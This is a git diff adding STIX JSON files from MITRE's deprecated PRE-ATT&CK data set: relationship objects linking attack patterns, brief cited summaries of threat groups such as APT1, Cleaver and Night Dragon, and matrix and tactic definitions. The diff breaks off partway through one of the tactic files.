diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json
new file mode 100644
index 0000000000000000000000000000000000000000..9a9496a97ff0e1bb750ee3b0224166b84b13847f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--8c855a00-13d9-4255-8968-acf5196de4dd",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--b180dee5-0d48-448f-94b9-4997f0c584d5",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json
new file mode 100644
index 0000000000000000000000000000000000000000..506c99ba34bb68aff9964c793b398bea9609daca
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--edfe4faf-a02e-40b0-acb6-f50fb88bae0e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json
new file mode 100644
index 0000000000000000000000000000000000000000..9f9d64db580a0004baf1835a78e778fea354529d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--23de2fe2-a6cd-4514-83be-7418a5269858",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json
new file mode 100644
index 0000000000000000000000000000000000000000..53113f1e0f4bd8a2ef92ad5a15e991bdf5f4df0d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--883f441a-445a-49d6-a85b-5a69349f0001",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--be031f72-737b-4afd-b2c1-c565f5ab7369",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json
new file mode 100644
index 0000000000000000000000000000000000000000..5cda4130a5711d278aa850f5e196920ed2a9dd13
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--b8b3f6e6-b4d6-4360-ab32-aaa2197575be",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json
new file mode 100644
index 0000000000000000000000000000000000000000..288b39eced613a1e2c08f798bc959e6c46b5c30b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--3a2c2458-0e54-4d17-8b8d-ddd5045b6af3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used third party hosting services in the U.S. in an attempt to hide their operations.(Citation: McAfee Night Dragon)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "McAfee Night Dragon",
+ "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.",
+ "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf"
+ }
+ ],
+ "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6",
+ "type": "relationship",
+ "modified": "2019-03-25T14:36:29.820Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json
new file mode 100644
index 0000000000000000000000000000000000000000..8804472ab3eff991198883237df1c78cc9d8e4d7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--72ac893c-7742-44c3-b102-5e6f4d0fbe21",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--d26a1746-b577-4a89-be5e-c49611e8c65a",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Cleaver](https://attack.mitre.org/groups/G0003) fake personas included profile photos, details, and network connections.(Citation: Dell Threat Group 2889)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/",
+ "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.",
+ "source_name": "Dell Threat Group 2889"
+ }
+ ],
+ "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201",
+ "type": "relationship",
+ "modified": "2019-03-22T20:00:23.896Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json
new file mode 100644
index 0000000000000000000000000000000000000000..898a93ad6f5e2c716e158162f2789d053d4dd406
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--a5919784-3675-42c9-b967-62259246e710",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json
new file mode 100644
index 0000000000000000000000000000000000000000..9869c0c3a05c1a221abd5ec38baa0b3e4910d5c4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--19e1e9e3-db4e-4db6-aff5-44a1e6245f82",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--db10491f-a854-4404-9271-600349484bc3",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but are used by APT1 for malicious purposes.(Citation: Mandiant APT1)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "Mandiant APT1",
+ "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+ }
+ ],
+ "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a",
+ "type": "relationship",
+ "modified": "2019-08-20T13:08:13.223Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json
new file mode 100644
index 0000000000000000000000000000000000000000..03912541d6aca39458bed9db4615905e61366f3d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--ee758073-8fc1-4312-8988-3b0da422b9c0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json
new file mode 100644
index 0000000000000000000000000000000000000000..2f0b638cea2dd845ea20a6bd6ca4b1fbb7f979e1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--c5a69776-ff29-46ab-9a80-db7d36cc1fb2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--e4501560-7850-4467-8422-2cf336429e8a",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json
new file mode 100644
index 0000000000000000000000000000000000000000..f983635d112c344849cef382524030d85a17b610
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--d6ec5464-84a3-4d38-a352-3cefeeb2e989",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--ef32147c-d309-4867-aaba-998088290e32",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json
new file mode 100644
index 0000000000000000000000000000000000000000..98f680ec447a03f887a152149b6432b800753c56
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--1e9fc7fa-29cf-434a-a6b4-01de14188be4",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json
new file mode 100644
index 0000000000000000000000000000000000000000..c39e53e11c024bcd375a396faada2c61e91df08d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--63a866d4-0193-43cc-aa32-8da9f5238cf9",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--f43faad4-a016-4da0-8de6-53103d429268",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has used zhCat to encrypt traffic or use inline obfuscation to make detection more difficult. zhCat makes message traffic look benign.(Citation: Cylance Cleaver)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "Cylance Cleaver",
+ "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.",
+ "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ }
+ ],
+ "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93",
+ "type": "relationship",
+ "modified": "2019-03-22T20:00:23.837Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json
new file mode 100644
index 0000000000000000000000000000000000000000..21eb9182a8528e960206ed531986cff5d1b0bf7f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--be101af8-2f2d-494d-bcf6-2063028e0610",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json
new file mode 100644
index 0000000000000000000000000000000000000000..c99eb1c16ee2d01fd5cd0ca62ec78af0fea33be4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--83b77644-5963-42a0-bb94-9ae2718b71a3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.",
+ "source_name": "FireEye EPS Awakens Part 2"
+ }
+ ],
+ "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b",
+ "type": "relationship",
+ "modified": "2019-03-22T14:20:45.685Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json
new file mode 100644
index 0000000000000000000000000000000000000000..eec74a3a703c85067bf75f599465ffff1ac1eb87
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json
@@ -0,0 +1,44 @@
+{
+ "type": "bundle",
+ "id": "bundle--f64ee064-53df-4d43-9599-6d18cca8612d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "PRE-ATT&CK",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/matrices/pre/).\n\nBelow are the tactics and techniques representing the MITRE PRE-ATT&CK Matrix.",
+ "external_references": [
+ {
+ "external_id": "pre-attack",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/matrices/pre"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "x-mitre-matrix",
+ "tactic_refs": [
+ "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940",
+ "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd",
+ "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6",
+ "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b",
+ "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb",
+ "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24",
+ "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec",
+ "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b",
+ "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b",
+ "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8",
+ "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c",
+ "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e",
+ "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266",
+ "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2",
+ "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607"
+ ],
+ "modified": "2020-10-22T15:43:48.844Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at
end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json
new file mode 100644
index 0000000000000000000000000000000000000000..af594c237fef9d9f8fef6c9a2207594b8bc77e58
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--8731f0a7-9257-493a-bb36-e628e0bc7ba6",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Technical Information Gathering",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0015/).\n\nTechnical information gathering consists of the process of identifying critical technical elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Technical intelligence gathering includes, but is not limited to, understanding the target's network architecture, IP space, network services, email format, and security procedures.",
+ "external_references": [
+ {
+ "external_id": "TA0015",
+ "url": "https://attack.mitre.org/tactics/TA0015",
+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "technical-information-gathering",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:33:53.838Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json
new file mode 100644
index 0000000000000000000000000000000000000000..759fe2d89b42b47e7f805748bfdeab05ee545b40
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--ff3a0b13-25df-4240-a889-17c67c32fd24",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Priority Definition Direction",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0013/).\n\nPriority definition direction consists of the process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.",
+ "external_references": [
+ {
+ "external_id": "TA0013",
+ "url": "https://attack.mitre.org/tactics/TA0013",
